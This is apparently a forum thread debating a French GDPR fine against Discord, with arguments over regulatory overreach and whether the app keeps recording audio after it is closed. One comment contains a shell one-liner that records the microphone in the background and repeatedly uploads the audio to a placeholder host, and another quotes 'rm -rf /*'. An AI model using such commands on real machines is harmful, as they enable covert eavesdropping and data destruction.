
[flagged]


With all due respect 800.000 is a moderate amount looking at some awards in the consumer space in the US considering that we are looking here at a situation where eavesdropping on other people in the privacy of their homes is involved.


They could simply warn the company if they thought that would really be a problem. Fining 800k is ridiculous. If they can do this, they can attack anyone with a similar reasoning, which effectively turns GDPR into a weapon.

Yeah, 800k might not be much, but the ideology is the problem here, not the amount.


The amount of the fine is explained in the bulletin you are commenting upon:

"The amount of the fine was decided regarding the breaches identified, the number of people concerned, but also taking into account the efforts made by the company throughout the procedure to reach compliance and the fact that its business model is not based on the exploitation of personal data."

So evidently there was a dialog with the company during which they remedied much of the fault. Isn't that exactly the sort of approach you'd want from a regulator?


> It's just a "weapon" by the EU to attack any company they want. I'm pretty much sure if I made a hello world program in C, they'd find a clever way of fining me.

Not so. Your hello world in C would be just fine. Only if you track data of users that happen to live in the EU. Don't track and you absolutely will not violate GDPR.

Discord broke the law in France and gets fined according to the laws in France.

The flagged issues could have been easily avoided by having a proper GDPR trained lawyer review the service and suggest changes.


I think GDPR being a weapon to attack companies is a good thing.

I've always thought that the bad aspect of GDPR is that it's General. We have in Slovenia a strict law about privacy and personal data protection. Companies with Slovene customers had to implement country specific notices and contracts, but GDPR made that easier. Especially for companies.

That's how I viewed it; as a legislation that allows companies to harvest user data easily and that's the main point why I was against it.

This comment sort of opened my mind a bit, now the same central legislation can also be used for the benefit of the people, since a legislation enforcement agency does not have to know so much regulation to defend user data. Though on the other hand, the GDPR is pretty long, much longer than Slovenian law (we didn't implement GDPR yet, SI is currently paying fees for not implementing it).

Note: Big AFAIK -- law is really not something I understand, please correct me or add your opinion.


Can you explain a bit more? What's the problem here?


EU being able to attack any developer by making up a GDPR excuse and fine them as they want is the problem here.


How are they even making things up here? If you read through the entire thing they have a very valid case against Discord, ranging from the UX being confusing (i.e. "data protection by default") to actually storing the data they are not allowed to (i.e. illegally).

If you operate in a jurisdiction you operate by that jurisdiction's laws. Do you think European companies don't have to abide by US laws when operating in the US?


That would be a problem. However, that is not what happened.

Discord (the company) was fined for multiple breaches of the GDPR regulation.


This is the reason why GDPR is something good.

Developers are not above the law. Companies are definitely not above the law, considering that the law is an impediment to their functioning and not something they will fight for.

The reign of super-large companies is a threat to democracy, because a democracy is made for its citizens; a company is a tool and should remain under control of society. Why can companies decide how much taxes they pay? Why can they decide where they pay them? How can they be so powerful as to decide that breaking society's will is merely a fine, and is taken into account in the budget? This is ridiculous. The companies are not citizens, they do not need to be cajoled.


> if I made a hello world program in C, they'd find a clever way of fining me

Last time I checked, Hello World does not contain any internet connection code; let me know an example of C hello world that grabs your microphone input then sends it over the internet. Probably would be a single Linux command line job.


Something like:

    nohup arecord /tmp/audio & ; nohup while :; do curl -F'data=/tmp/audio' http://example.com; done &

Untested pseudocode, but probably close - that's enough for a GDPR violation I guess? That it'd record unimpeded while running in the background, and sending the output elsewhere?

Pretty stupid scenario - sad Discord had locations in that area, because I agree with a lot of other posters, it seems to just be a weaponized law for monetary gain.


> that's enough for a GDPR violation I guess?

No, you would also need to run on computers of people not understanding what is going on.

In the same way as running

> rm -rf /*

on computers of people not understanding what is going on (or not agreeing to it) and where you are not allowed to do so is illegal, for quite good reasons.


Did the users choose to install the Discord app (or run a random command?)

How are you supposed to confirm "user understanding"?

Does the program need to require a tutorial/training before it's being used?

A user's ignorance shouldn't be a software distributor's problem.

If the discord app didn't have a system tray, and hid its process from the Process List some way, maybe you have a point - this is just ignorance across the board.


I think if closing is actually not killing the app, you should ensure the user is aware the app is still recording. Some apps will show a recording thingy on the screen or it will tell you before closing and you need to agree.

I don't have the time to test this, but if it is true that you close the app and it still continues recording, then this is bad UX and the company should have prioritized fixing this instead of adding even more crap. Maybe some good practices would come from this.


Doesn't it show a system tray icon? (I don't use discord on Windows, or a system tray myself) - is a system tray icon not adequate? I believe it would show 24/7 wouldn't it?


I am not sure, it won't be enough IMO if the icon in the Tray is not changing to a clear Recording icon.

It would be like on my phone the big red End Call button would not end the call, just minimize the app and put a small gray icon on the top-bar section.


The system tray icon turns into a generic circle that nobody would associate with Discord unless they tried clicking it.

Windows has also been hiding all system tray icons for over 2 decades at this point, unless the user specifically unhides that application.


> A user's ignorance shouldn't be a software distributor's problem.

Deliberately causing user's ignorance should be a software distributor's problem.



